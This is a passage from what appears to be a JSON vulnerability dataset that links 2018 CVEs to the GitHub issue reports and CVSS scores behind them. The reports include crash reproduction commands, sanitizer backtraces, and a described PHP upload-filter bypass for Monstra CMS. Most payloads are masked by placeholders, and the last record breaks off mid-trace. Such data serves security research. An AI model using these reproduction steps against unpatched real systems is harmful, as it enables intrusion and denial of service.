  31581. "Issue_Url_old": "https://github.com/libming/libming/issues/101",
  31582. "Issue_Url_new": "https://github.com/libming/libming/issues/101",
  31583. "Repo_new": "libming/libming",
  31584. "Issue_Created_At": "2018-01-12T00:48:40Z",
  31585. "description": "NULL pointer dereference in APITAG . Hello. I found a NULL pointer dereference in libming. Please confirm. Thanks. Summary: NULL pointer dereference OS: APITAG NUMBERTAG bit Version: APITAG APITAG Download: FILETAG Steps to reproduce: APITAG the .POC files. APITAG the source code with APITAG APITAG the following command : swftocxx $FILE out ERRORTAG ========== APITAG This work was supported by ICT R&D program of MSIP/IITP. [R NUMBERTAG Innovation hub for high Performance Computing]",
  31586. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31587. "severity": "HIGH",
  31588. "baseScore": 8.8,
  31589. "impactScore": 5.9,
  31590. "exploitabilityScore": 2.8
  31591. },
  31592. {
  31593. "CVE_ID": "CVE-2018-6353",
  31594. "Issue_Url_old": "https://github.com/spesmilo/electrum/issues/3678",
  31595. "Issue_Url_new": "https://github.com/spesmilo/electrum/issues/3678",
  31596. "Repo_new": "spesmilo/electrum",
  31597. "Issue_Created_At": "2018-01-09T02:56:47Z",
  31598. "description": "why is it possible to execute arbitrary system commands via python code through the electrum console. wondering why it is currently possible to execute arbitrary system commands via python code through the electrum console, and why there is no whitelisting/blacklisting of allowed methods/functions as this seems like a major security issue",
  31599. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  31600. "severity": "HIGH",
  31601. "baseScore": 7.8,
  31602. "impactScore": 5.9,
  31603. "exploitabilityScore": 1.8
  31604. },
  31605. {
  31606. "CVE_ID": "CVE-2018-6358",
  31607. "Issue_Url_old": "https://github.com/libming/libming/issues/104",
  31608. "Issue_Url_new": "https://github.com/libming/libming/issues/104",
  31609. "Repo_new": "libming/libming",
  31610. "Issue_Created_At": "2018-01-26T10:13:05Z",
  31611. "description": "Heap Buffer Overflow in listfdb (master, libming NUMBERTAG and earlier). The APITAG function (util/listfdb.c) in libming through NUMBERTAG is vulnerable to a heap buffer overflow. This vulnerability is also affecting the master branch. Reproduce: APITAG Output: ERRORTAG This may allow attackers to cause a denial of service or unspecified other impact via a crafted FDB file. You can find the reproducer FILETAG .",
  31612. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31613. "severity": "HIGH",
  31614. "baseScore": 8.8,
  31615. "impactScore": 5.9,
  31616. "exploitabilityScore": 2.8
  31617. },
  31618. {
  31619. "CVE_ID": "CVE-2018-6359",
  31620. "Issue_Url_old": "https://github.com/libming/libming/issues/105",
  31621. "Issue_Url_new": "https://github.com/libming/libming/issues/105",
  31622. "Repo_new": "libming/libming",
  31623. "Issue_Created_At": "2018-01-27T10:51:57Z",
  31624. "description": "heap use after free in APITAG Hello. I found a heap use after free bug in libming. Please confirm. Thanks. Summary: heap use after free OS: APITAG NUMBERTAG bit Version: APITAG APITAG Download: Steps to reproduce: APITAG the .POC files. APITAG the source code with APITAG APITAG the following command : ./swftocxx $POC /dev/null ERRORTAG ================= APITAG This work was supported by ICT R&D program of MSIP/IITP. [R NUMBERTAG Innovation hub for high Performance Computing]",
  31625. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31626. "severity": "HIGH",
  31627. "baseScore": 8.8,
  31628. "impactScore": 5.9,
  31629. "exploitabilityScore": 2.8
  31630. },
  31631. {
  31632. "CVE_ID": "CVE-2018-6360",
  31633. "Issue_Url_old": "https://github.com/mpv-player/mpv/issues/5456",
  31634. "Issue_Url_new": "https://github.com/mpv-player/mpv/issues/5456",
  31635. "Repo_new": "mpv-player/mpv",
  31636. "Issue_Created_At": "2018-01-27T23:44:09Z",
  31637. "description": "Protocol whitelist in ytdl_hook. The recent commits APITAG APITAG APITAG and APITAG fix and issue whereby mpv could be convinced to play a \"non safe\" URL from a remote source. Reproduction steps An attacker convinces has the victim play an HTTP(S) URL. APITAG The URL gets processed by the FILETAG script. youtube dl attempts to extract videos from the URL by contacting the HTTP server, which responds with something like (text/html mime typed) : CODETAG As youtube dl does not perform any validation on the extracted URLs for APITAG tags, the APITAG URL gets passed back to the hook script. APITAG that there are likely many ways URLTAG in which youtube dl can return \"bad\" URLs._ The hook script then passes the extracted URL to mpv, which does not apply the usual safe protocol only checks URLTAG . As shown in the example above, this URL can be, for instance, used to APITAG URLTAG arbitrary files on the filesystem using the ffmpeg lavfi ladspa plugin.",
  31638. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31639. "severity": "HIGH",
  31640. "baseScore": 8.8,
  31641. "impactScore": 5.9,
  31642. "exploitabilityScore": 2.8
  31643. },
  31644. {
  31645. "CVE_ID": "CVE-2018-6381",
  31646. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/12",
  31647. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/12",
  31648. "Repo_new": "gdraheim/zziplib",
  31649. "Issue_Created_At": "2018-01-29T05:19:41Z",
  31650. "description": "Invalid memory access in zzip_disk_fread ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib: there is a segmentation fault caused by invalid memory access in zzip_disk_fread function ( PATHTAG ), which could be triggered by the POC below. The issue happens since with the crafted zip file, in line NUMBERTAG of zzip_disk_fread function, \"size\" variable could be much larger than the capacity of \"file >stored\". Note that this function dwells in library code, which means programs based on libzzip could be affected NUMBERTAG if (file >stored NUMBERTAG memcpy(ptr, file >stored, size NUMBERTAG file >stored += size NUMBERTAG file >avail = size NUMBERTAG return size NUMBERTAG To reproduce the issue, run: ./unzip mem $POC The POC could be downloaded at: FILETAG The backtrace is: (gdb) bt NUMBERTAG ffff NUMBERTAG ERRORTAG NUMBERTAG in __memcpy_ssse3 () from APITAG NUMBERTAG ffff7bd7cd3 in zzip_disk_fread (ptr NUMBERTAG fffffffd7b0, sized NUMBERTAG nmemb NUMBERTAG file NUMBERTAG at PATHTAG NUMBERTAG ffff7bd8a NUMBERTAG in zzip_mem_disk_fread (ptr NUMBERTAG fffffffd7b0, size NUMBERTAG nmemb NUMBERTAG file NUMBERTAG at PATHTAG NUMBERTAG c8c in zzip_mem_entry_pipe (disk NUMBERTAG entry NUMBERTAG out NUMBERTAG e0) at PATHTAG NUMBERTAG cfe in zzip_mem_entry_make (disk NUMBERTAG entry NUMBERTAG at PATHTAG NUMBERTAG b5 in zzip_mem_entry_makeall (disk NUMBERTAG at PATHTAG NUMBERTAG c7f in main (argc NUMBERTAG arg NUMBERTAG fffffffdd NUMBERTAG at PATHTAG",
  31651. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31652. "severity": "MEDIUM",
  31653. "baseScore": 6.5,
  31654. "impactScore": 3.6,
  31655. "exploitabilityScore": 2.8
  31656. },
  31657. {
  31658. "CVE_ID": "CVE-2018-6383",
  31659. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/429",
  31660. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/429",
  31661. "Repo_new": "monstra-cms/monstra",
  31662. "Issue_Created_At": "2018-01-29T12:59:28Z",
  31663. "description": "'pht' extension can bypassed extension filter in uploading process. Brief of this vulnerability In uploading process, Monstra filters some of dangerous extensions using blacklist. But it is not perfect because default setting of \"libapache2 mod php5\" allow 'pht' to execute php scripts. Test Environment APITAG APITAG PHP NUMBERTAG deb8u1 (cli) Affect version NUMBERTAG Payload NUMBERTAG Save php codes with '.pht' extensions. and upload it like below. APITAG NUMBERTAG Click the uploaded file name or move to APITAG NUMBERTAG Profit! Reason of Vulnerability Default setting of php5 module for apache2(libapache2 mod php5) allow several extensions to execute as php script. This is some part of APITAG . CODETAG Because of this config, list of extension allowed to run php script is APITAG and 'phps' extension shows source code of php file. But Monstra prevent to upload php style files using extension filer in uploading process at APITAG like below. CODETAG Almost allowed extensions to execute as php can be filtered but 'pht' is not. As a result, attacker can upload malicious php file using pht extensions.",
  31664. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  31665. "severity": "HIGH",
  31666. "baseScore": 8.8,
  31667. "impactScore": 5.9,
  31668. "exploitabilityScore": 2.8
  31669. },
  31670. {
  31671. "CVE_ID": "CVE-2018-6405",
  31672. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/964",
  31673. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/964",
  31674. "Repo_new": "imagemagick/imagemagick",
  31675. "Issue_Created_At": "2018-01-30T04:23:18Z",
  31676. "description": "coders/dcm.c Memory Leak. System Configuration APITAG version: APITAG NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: compilation with asan Description Occur Memory Leak URLTAG $ ./magick convert ~/leak1.dcm FILETAG convert: APITAG ERRORTAG PATHTAG @ PATHTAG convert: APITAG ERRORTAG APITAG @ PATHTAG convert: APITAG ERRORTAG FILETAG ' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG bd NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG d1d in APITAG ( PATHTAG NUMBERTAG dcd in APITAG ( PATHTAG NUMBERTAG c8a NUMBERTAG in APITAG ( PATHTAG NUMBERTAG af NUMBERTAG in APITAG ( PATHTAG NUMBERTAG af4ff4 in APITAG ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG ( PATHTAG NUMBERTAG e8af9 in APITAG ( PATHTAG NUMBERTAG e NUMBERTAG in main ( PATHTAG NUMBERTAG f8ea NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). $ ./magick convert ~/leak3.dcm ./a.png convert: APITAG ERRORTAG PATHTAG @ PATHTAG convert: APITAG `./a.png' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG bd NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG d1d in APITAG ( PATHTAG NUMBERTAG dcd in APITAG ( PATHTAG NUMBERTAG c NUMBERTAG in APITAG ( PATHTAG NUMBERTAG af NUMBERTAG in APITAG ( PATHTAG NUMBERTAG af4ff4 in APITAG ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG ( PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG ( PATHTAG NUMBERTAG e8af9 in APITAG ( PATHTAG NUMBERTAG e NUMBERTAG in main ( PATHTAG NUMBERTAG fb NUMBERTAG bdc NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). Crash File : FILETAG Credit : Kyeongseok Yang & Choongwoo Han, Naver Security Team",
  31677. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31678. "severity": "MEDIUM",
  31679. "baseScore": 6.5,
  31680. "impactScore": 3.6,
  31681. "exploitabilityScore": 2.8
  31682. },
  31683. {
  31684. "CVE_ID": "CVE-2018-6470",
  31685. "Issue_Url_old": "https://github.com/dignajar/nibbleblog/issues/120",
  31686. "Issue_Url_new": "https://github.com/dignajar/nibbleblog/issues/120",
  31687. "Repo_new": "dignajar/nibbleblog",
  31688. "Issue_Created_At": "2018-02-01T11:02:23Z",
  31689. "description": "APITAG Information leak. Nibbleblog NUMBERTAG on APITAG defaults to having APITAG in each directory, causing APITAG information to leak.",
  31690. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  31691. "severity": "MEDIUM",
  31692. "baseScore": 5.3,
  31693. "impactScore": 1.4,
  31694. "exploitabilityScore": 3.9
  31695. },
  31696. {
  31697. "CVE_ID": "CVE-2018-6480",
  31698. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/159",
  31699. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/159",
  31700. "Repo_new": "cn-uofbasel/ccn-lite",
  31701. "Issue_Created_At": "2018-01-30T10:22:49Z",
  31702. "description": "type confusion in APITAG Hi, the following code in APITAG assumes that the union member s is of type ccnl_pktdetail_ndntlv_s . However, if the type is in fact of type struct ccnl_pktdetail_ccntlv_s or struct ccnl_pktdetail_iottlv_s , the memory at that point is either uninitialised or points to data which is not a nonce , which renders the code using the local variable nonce pointless. CODETAG This goes on and on. The function in APITAG (guarded by a USE_DUP_CHECK ) also starts to iterate over the pit and checks if the (maybe non existing nonce field) matches data in the pit, i.e. CODETAG If this is an issue how do we handle it? I would start writing checks and guards, but I want to make sure that you consider this an issue as well. TIA Michael",
  31703. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31704. "severity": "HIGH",
  31705. "baseScore": 8.8,
  31706. "impactScore": 5.9,
  31707. "exploitabilityScore": 2.8
  31708. },
  31709. {
  31710. "CVE_ID": "CVE-2018-6484",
  31711. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/14",
  31712. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/14",
  31713. "Repo_new": "gdraheim/zziplib",
  31714. "Issue_Created_At": "2018-02-01T03:19:18Z",
  31715. "description": "Bus error in __zzip_fetch_disk_trailer ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib: there is a bus error caused by loading of misaligned address in __zzip_fetch_disk_trailer function of PATHTAG which could be triggered by the POC below. The issue happens since the struct zzip_disk_trailer \"orig\" (line NUMBERTAG could be manipulated by a crafted zip file, resulting in a misaligned memory access and bus error. Note that the issue is in libzip and may affect downstream programs. The POC is as small as NUMBERTAG bytes NUMBERTAG struct zzip_disk_trailer orig NUMBERTAG struct zzip_disk_trailer ) tail NUMBERTAG trailer >zz_rootseek = APITAG To reproduce the issue, run: ./zzdir $POC The POC could be downloaded at: FILETAG PATHTAG runtime error: load of misaligned address NUMBERTAG f NUMBERTAG d NUMBERTAG a NUMBERTAG for type 'uint NUMBERTAG t', which requires NUMBERTAG byte alignment NUMBERTAG f NUMBERTAG d NUMBERTAG a NUMBERTAG note: pointer points here NUMBERTAG",
  31716. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31717. "severity": "MEDIUM",
  31718. "baseScore": 6.5,
  31719. "impactScore": 3.6,
  31720. "exploitabilityScore": 2.8
  31721. },
  31722. {
  31723. "CVE_ID": "CVE-2018-6536",
  31724. "Issue_Url_old": "https://github.com/Icinga/icinga2/issues/5991",
  31725. "Issue_Url_new": "https://github.com/icinga/icinga2/issues/5991",
  31726. "Repo_new": "icinga/icinga2",
  31727. "Issue_Created_At": "2018-01-16T18:53:37Z",
  31728. "description": "Partial privilege escalation via PID file manipulation. The icinga2 daemon creates its PID file after dropping privileges to the APITAG . That may be exploited through the init script (or other management tools) by the APITAG to kill root processes, since when the daemon is stopped, root sends a \"kill\" signal to the contents of the PID file (which are under the control of the runtime user). For example, APITAG However, the init script ( APITAG ) is executed as root, and does, ERRORTAG If the daemon is in any way compromised, the APITAG can write a PID of his choice into his own PID file. The next time the icinga2 service is stopped, his desired PID will be killed. That can be abused to kill off sshd, to reboot the machine, etc. The \"easy\" way to work around this problem is to create the PID file as root, before dropping privileges. That comes with its own set of problems, in particular that you won't be able to modify or delete the PID file in the forked (non root) process. It does however allow a very dumb, portable, init script to handle the PID file safely.",
  31729. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  31730. "severity": "MEDIUM",
  31731. "baseScore": 5.5,
  31732. "impactScore": 3.6,
  31733. "exploitabilityScore": 1.8
  31734. },
  31735. {
  31736. "CVE_ID": "CVE-2018-6540",
  31737. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/15",
  31738. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/15",
  31739. "Repo_new": "gdraheim/zziplib",
  31740. "Issue_Created_At": "2018-02-01T14:09:11Z",
  31741. "description": "Bus error in zzip_disk_findfirst ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib: there is a bus error caused by loading of misaligned address in zzip_disk_findfirst function of PATHTAG which could be triggered by the POC below. Note that this issue is different from CVETAG . The issue happens since the pointer \"trailer\" (line NUMBERTAG could be manipulated by a crafted zip file, resulting in a misaligned memory access and bus error. Note that the issue is in libzip and may affect downstream programs. The POC is as small as NUMBERTAG bytes NUMBERTAG struct zzip_disk_trailer trailer = (struct zzip_disk_trailer ) p NUMBERTAG zzip_size_t rootseek = APITAG To reproduce the issue, run: ./unzip mem p $POC The POC could be downloaded at: FILETAG PATHTAG runtime error: load of misaligned address NUMBERTAG fc NUMBERTAG f2 for type 'uint NUMBERTAG t', which requires NUMBERTAG byte alignment NUMBERTAG fc NUMBERTAG f2: note: pointer points here NUMBERTAG b5 b5 b5 b5 b5 b5 b NUMBERTAG",
  31742. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31743. "severity": "MEDIUM",
  31744. "baseScore": 6.5,
  31745. "impactScore": 3.6,
  31746. "exploitabilityScore": 2.8
  31747. },
  31748. {
  31749. "CVE_ID": "CVE-2018-6541",
  31750. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/16",
  31751. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/16",
  31752. "Repo_new": "gdraheim/zziplib",
  31753. "Issue_Created_At": "2018-02-01T16:17:31Z",
  31754. "description": "Bus error when handling disk NUMBERTAG trailer in __zzip_fetch_disk_trailer ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib: there is a bus error caused by loading of misaligned address when handling disk NUMBERTAG trailer local entries in __zzip_fetch_disk_trailer function of PATHTAG which could be triggered by the POC below. The issue happens since the struct zzip_disk_trailer \"orig\" (line NUMBERTAG could be manipulated by a crafted zip file, resulting in a misaligned memory access and bus error. Note that the issue is in libzip and may affect downstream programs. This issue is different from CVETAG , and arises when invoking a different function NUMBERTAG APITAG NUMBERTAG trailer >zz_finalentries NUMBERTAG APITAG To reproduce the issue, run: ./unzzip p $POC FILETAG PATHTAG runtime error: load of misaligned address NUMBERTAG f1d4f NUMBERTAG for type 'uint NUMBERTAG t', which requires NUMBERTAG byte alignment NUMBERTAG f1d4f NUMBERTAG note: pointer points here NUMBERTAG dd e NUMBERTAG a NUMBERTAG b NUMBERTAG dd e NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG",
  31755. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31756. "severity": "MEDIUM",
  31757. "baseScore": 6.5,
  31758. "impactScore": 3.6,
  31759. "exploitabilityScore": 2.8
  31760. },
  31761. {
  31762. "CVE_ID": "CVE-2018-6542",
  31763. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/17",
  31764. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/17",
  31765. "Repo_new": "gdraheim/zziplib",
  31766. "Issue_Created_At": "2018-02-01T16:17:35Z",
  31767. "description": "Bus error when handling (root seek of disk NUMBERTAG trailer) in zzip_disk_findfirst ( PATHTAG ) . On latest version NUMBERTAG and master branch of zziplib: there is a bus error (when handling seek of disk NUMBERTAG trailer) caused by loading of misaligned address in zzip_disk_findfirst function of PATHTAG which could be triggered by the POC below. Note that this issue is different from URLTAG The issue happens since the pointer \"trailer\" (line NUMBERTAG could be manipulated by a crafted zip file, resulting in a misaligned memory access and bus error. Note that the issue is in libzip and may affect downstream programs. The POC is as small as NUMBERTAG bytes NUMBERTAG zzip_size_t rootseek = APITAG To reproduce the issue, run: ./unzip mem p $POC The POC could be downloaded at: FILETAG PATHTAG runtime error: load of misaligned address NUMBERTAG f NUMBERTAG f NUMBERTAG e NUMBERTAG for type 'uint NUMBERTAG t', which requires NUMBERTAG byte alignment NUMBERTAG f NUMBERTAG f NUMBERTAG e NUMBERTAG note: pointer points here NUMBERTAG d NUMBERTAG",
  31768. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31769. "severity": "MEDIUM",
  31770. "baseScore": 6.5,
  31771. "impactScore": 3.6,
  31772. "exploitabilityScore": 2.8
  31773. },
  31774. {
  31775. "CVE_ID": "CVE-2018-6550",
  31776. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/427",
  31777. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/427",
  31778. "Repo_new": "monstra-cms/monstra",
  31779. "Issue_Created_At": "2018-01-23T10:58:03Z",
  31780. "description": "Stored Cross Site Scripting Vulnerability . Hi, I have found a stored XSS vulnerability. Affected Version NUMBERTAG or before Affected URL: FILETAG Payload ERRORTAG Steps to replicate NUMBERTAG Goto URLTAG NUMBERTAG Create a new page NUMBERTAG Navigate to link section NUMBERTAG Enter payload as shown in above section NUMBERTAG isit FILETAG NUMBERTAG You will triage APITAG execution Impacts: A user with editor level privileges can make APITAG code execution in admin's session. Testing Environment NUMBERTAG Server: Apache NUMBERTAG PHP NUMBERTAG Mitigation: Pass user input from below mentioned function ERRORTAG",
  31781. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  31782. "severity": "MEDIUM",
  31783. "baseScore": 5.4,
  31784. "impactScore": 2.7,
  31785. "exploitabilityScore": 2.3
  31786. },
  31787. {
  31788. "CVE_ID": "CVE-2018-6558",
  31789. "Issue_Url_old": "https://github.com/google/fscrypt/issues/77",
  31790. "Issue_Url_new": "https://github.com/google/fscrypt/issues/77",
  31791. "Repo_new": "google/fscrypt",
  31792. "Issue_Created_At": "2018-01-23T18:16:14Z",
  31793. "description": "pam_fscrypt messes up user groups during login. I've added APITAG to APITAG (on Arch Linux) as described in the README: CODETAG With APITAG enabled, I'm no longer in the wheel group after login for some reason, which means I can no longer use sudo . Instead, it adds me to the root group: APITAG With APITAG commented out: APITAG Log: ERRORTAG Any ideas? :)",
  31794. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  31795. "severity": "MEDIUM",
  31796. "baseScore": 6.5,
  31797. "impactScore": 3.6,
  31798. "exploitabilityScore": 2.8
  31799. },
  31800. {
  31801. "CVE_ID": "CVE-2018-6574",
  31802. "Issue_Url_old": "https://github.com/golang/go/issues/23672",
  31803. "Issue_Url_new": "https://github.com/golang/go/issues/23672",
  31804. "Repo_new": "golang/go",
  31805. "Issue_Created_At": "2018-02-02T21:36:18Z",
  31806. "description": "security: issue [Go NUMBERTAG rc1]. Placeholder issue for cause of next week's security release. Will be filled in at release time. /cc MENTIONTAG",
  31807. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  31808. "severity": "HIGH",
  31809. "baseScore": 7.8,
  31810. "impactScore": 5.9,
  31811. "exploitabilityScore": 1.8
  31812. },
  31813. {
  31814. "CVE_ID": "CVE-2018-6594",
  31815. "Issue_Url_old": "https://github.com/dlitz/pycrypto/issues/253",
  31816. "Issue_Url_new": "https://github.com/pycrypto/pycrypto/issues/253",
  31817. "Repo_new": "pycrypto/pycrypto",
  31818. "Issue_Created_At": "2018-02-02T05:45:26Z",
  31819. "description": "Attack on APITAG APITAG Encryption with Proof of Concept APITAG Joint work with MENTIONTAG We attack APITAG URLTAG , a successor of APITAG The result is transferable. I repeat our post URLTAG here again: The textbook APITAG implementation is not secure. APITAG and its relevant implementations, APITAG and libgcrypt, use the wrong algorithm. I would give the basic idea as follows. Readers with modern algebra background can jump to MENTIONTAG 's explanation here URLTAG . The wrong implementation has two messages classes. Due to technical reasons, all messages are classified into two classes. A random message belongs to one of them (with NUMBERTAG possibility). FILETAG In some applications, there are only several possible messages. Consider we are sending a military message. There are only two outcomes: the army moved forward or retracted. With a high possibility, they belong to different classes. Encrypt the two messages. We now encrypt two messages with APITAG FILETAG The encrypted result is called a ciphertext. It should reveal NO information about the original message. Expectation: encrypted message has indistinguishability. We expect a secure encryption scheme to provide message indistinguishability. No adversary can learn what is encrypted inside the ciphertext better than a random guess. FILETAG Let us assume the headquarter sent the second message no adversary should to able to learn. Truth: the adversary can distinguish messages in two different classes. Due to the wrong implementation, the adversary can distinguish messages in different classes. FILETAG If the outcomes differ in which classes they belong to, then an adversary can infer more information. Proof of Concept APITAG We release our attack code in this APITAG repo: URLTAG A running trace is collected by Travis CI: URLTAG Showing that our adversary makes NUMBERTAG mistakes in guessing the messages if the two outcomes differ in the classes they belong to. Discussion The problem can be fixed by using APITAG carefully on the correct algebra group. Some results are given by MENTIONTAG and me on issue URLTAG . This bug is prevalent. It exists in legacy APITAG and libgcrypt (if used directly to encrypt messages).",
  31820. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  31821. "severity": "HIGH",
  31822. "baseScore": 7.5,
  31823. "impactScore": 3.6,
  31824. "exploitabilityScore": 3.9
  31825. },
  31826. {
  31827. "CVE_ID": "CVE-2018-6616",
  31828. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1059",
  31829. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1059",
  31830. "Repo_new": "uclouvain/openjpeg",
  31831. "Issue_Created_At": "2018-02-04T20:07:05Z",
  31832. "description": "Excessive Iteration in opj_t1_encode_cblks ( PATHTAG ). On the latest version NUMBERTAG and master branch of openjpeg, there is an excessive iteration in the opj_t1_encode_cblks function of PATHTAG which could be triggered by the POC below. Note that processing the POC of only NUMBERTAG bytes could cost openjpeg more than NUMBERTAG minutes. We found, in the code, the program is stuck in a NUMBERTAG level \"for\" loops of opj_t1_encode_cblks function. The terminating variables of these loops could be manipulated by the input file. Although the variables are quite reasonable (with prc >cw prc >ch NUMBERTAG the program gives no response for a long time and it causes denial of service. This issue is different from URLTAG which has been fixed in commit NUMBERTAG OPJ_BOOL opj_t1_encode_cblks(opj_t1_t t NUMBERTAG for (compno NUMBERTAG compno < tile >numcomps; ++compno NUMBERTAG for (resno NUMBERTAG resno < tilec >numresolutions; ++resno NUMBERTAG for (bandno NUMBERTAG bandno < res >numbands; ++bandno NUMBERTAG for (precno NUMBERTAG precno < res >pw res >ph; ++precno NUMBERTAG for (cblkno NUMBERTAG cblkno < prc >cw prc >ch; ++cblkno NUMBERTAG cblkno NUMBERTAG precno NUMBERTAG bandno NUMBERTAG resno NUMBERTAG compno NUMBERTAG return OPJ_TRUE NUMBERTAG To reproduce the issue, run: ./opj_compress n NUMBERTAG i $POC o /tmp/null.j2k POC: FILETAG Stack trace NUMBERTAG ffff NUMBERTAG a NUMBERTAG a in opj_t1_enc_sigpass_step (t NUMBERTAG bec0, flagsp NUMBERTAG a NUMBERTAG f4ac, datap NUMBERTAG fffdc NUMBERTAG a NUMBERTAG bpno NUMBERTAG one NUMBERTAG nmsedec NUMBERTAG fffffff7c NUMBERTAG type NUMBERTAG ci NUMBERTAG sc NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG ab in opj_t1_enc_sigpass (t NUMBERTAG bec0, bpno NUMBERTAG nmsedec NUMBERTAG fffffff7c NUMBERTAG type NUMBERTAG cblksty NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG ff1f8 in opj_t1_encode_cblk (t NUMBERTAG bec0, cblk NUMBERTAG d NUMBERTAG d7f NUMBERTAG orient NUMBERTAG compno NUMBERTAG level NUMBERTAG qmfbid NUMBERTAG stepsize NUMBERTAG cblksty NUMBERTAG numcomps NUMBERTAG tile NUMBERTAG fc NUMBERTAG mct_norms NUMBERTAG ffff NUMBERTAG dc NUMBERTAG APITAG , mct_numcomps NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG fe3f1 in opj_t1_encode_cblks (t NUMBERTAG bec0, tile NUMBERTAG fc NUMBERTAG tcp NUMBERTAG c NUMBERTAG mct_norms NUMBERTAG ffff NUMBERTAG dc NUMBERTAG APITAG , mct_numcomps NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG a in opj_tcd_t1_encode (p_tcd NUMBERTAG b NUMBERTAG af NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG dcf1 in opj_tcd_encode_tile (p_tcd NUMBERTAG b NUMBERTAG af NUMBERTAG p_tile_no NUMBERTAG p_dest NUMBERTAG fff NUMBERTAG e NUMBERTAG repeats NUMBERTAG times>..., APITAG p_max_length NUMBERTAG p_cstr_info NUMBERTAG p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff NUMBERTAG ccadf in opj_j2k_write_sod (p_j2k NUMBERTAG de NUMBERTAG p_tile_coder NUMBERTAG b NUMBERTAG af NUMBERTAG p_data NUMBERTAG fff NUMBERTAG e NUMBERTAG repeats NUMBERTAG times>..., APITAG p_total_data_size NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff NUMBERTAG bc in opj_j2k_write_first_tile_part (p_j2k NUMBERTAG de NUMBERTAG p_data NUMBERTAG fff NUMBERTAG c PATHTAG NUMBERTAG repeats NUMBERTAG times>..., APITAG p_total_data_size NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff NUMBERTAG be in opj_j2k_post_write_tile (p_j2k NUMBERTAG de NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG 